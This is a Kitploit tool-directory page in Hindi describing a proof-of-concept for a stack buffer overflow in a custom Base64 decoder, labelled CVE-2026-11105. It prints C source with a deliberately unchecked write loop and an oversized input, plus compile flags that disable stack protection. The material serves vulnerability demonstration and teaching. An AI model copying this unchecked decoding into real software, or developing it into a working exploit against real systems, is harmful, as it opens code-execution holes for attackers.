Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-11105-Stack-Buffer-Overflow-in-Custom-Base64-Decoder — CVE-2026-11105 PoC जो एक कस्टम Base64 डिकोडर में स्टैक बफर ओवरफ्लो को प्रदर्शित करता है; विशेष रूप से निर्मित अत्यधिक बड़ा इनपुट स्टैक मेमोरी को अधिलेखित कर देता है और मनमाना कोड निष्पादन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-11105-stack-buffer-overflow-in-custom-base64-decoder
भेद्यता विश्लेषणशोषणलर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषण
GitHubgeorge0papasotiriou/cve-2026-11105-stack-buffer-overflow-in-custom-base64-decoder

CVE-2026-11105-Stack-Buffer-Overflow-in-Custom-Base64-Decoder

CVE-2026-11105 PoC जो एक कस्टम Base64 डिकोडर में स्टैक बफर ओवरफ्लो को प्रदर्शित करता है; विशेष रूप से निर्मित अत्यधिक बड़ा इनपुट स्टैक मेमोरी को अधिलेखित कर देता है और मनमाना कोड निष्पादन को सक्षम बनाता है।

रिपॉजिटरी देखें
131 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-11105 – कस्टम Base64 डिकोडर में स्टैक बफर ओवरफ्लो

प्रोग्राम कोड (C)

// base64_vuln.c - Vulnerable Base64 decoder
#include <stdio.h>
#include <string.h>
#include <stdint.h>

int base64_decode(const char *in, size_t inlen, char *out, size_t outlen) {
    static const char table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    int outpos = 0;
    for (int i=0; i<inlen; i+=4) {
        uint32_t sextet = 0;
        int bytes = 0;
        for (int j=0; j<4; j++) {
            if (i+j >= inlen) break;
            const char *p = strchr(table, in[i+j]);
            if (p) sextet = (sextet << 6) | (p - table);
            else bytes++;
        }
        // No check on outpos exceeding outlen!
        out[outpos++] = (sextet >> 16) & 0xFF;
        if (bytes < 2) out[outpos++] = (sextet >> 8) & 0xFF;
        if (bytes < 1) out[outpos++] = sextet & 0xFF;
    }
    return outpos;
}

int main() {
    char smallbuf[8];
    char *malicious = "AAAA"; // padded, decodes to 3 bytes, but we'll feed a long string
    // Attacker sends very long Base64 string, overflows smallbuf
    base64_decode("QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB", 60, smallbuf, 8);
    return 0;
}

CVE-2026-11105 – Base64 डिकोडर में स्टैक बफर ओवरफ्लो

Severity: Critical

अवलोकन

एक कस्टम Base64 डिकोडिंग फ़ंक्शन आउटपुट बफर के आकार को मान्य नहीं करता है, जिससे एक क्लासिक स्टैक बफर ओवरफ्लो होता है। एक हमलावर रिटर्न एड्रेस को अधिलेखित करने और कोड निष्पादन प्राप्त करने के लिए एक अत्यधिक बड़ा इनपुट तैयार कर सकता है।

भेद्यता विवरण

  • प्रकार: स्टैक बफर ओवरफ्लो
  • प्रभाव: रिमोट कोड निष्पादन (यदि नेटवर्क पर उजागर हो)।
  • मूल कारण: डिकोडर आवंटित बफर के भीतर आउटपुट पॉइंटर बना रहता है यह सुनिश्चित किए बिना डिकोड किए गए बाइट्स को क्रमिक रूप से लिखता है।

एक्सप्लॉइट प्रदर्शन

  1. कमजोर डिकोडर को संकलित करें (सुरक्षा अक्षम करें):
    gcc -o base64_vuln base64_vuln.c -fno-stack-protector -z execstack
    
  2. Run the exploit script to trigger the overflow:
    python exploit_base64_overflow.py
    
टूल डाउनलोड करें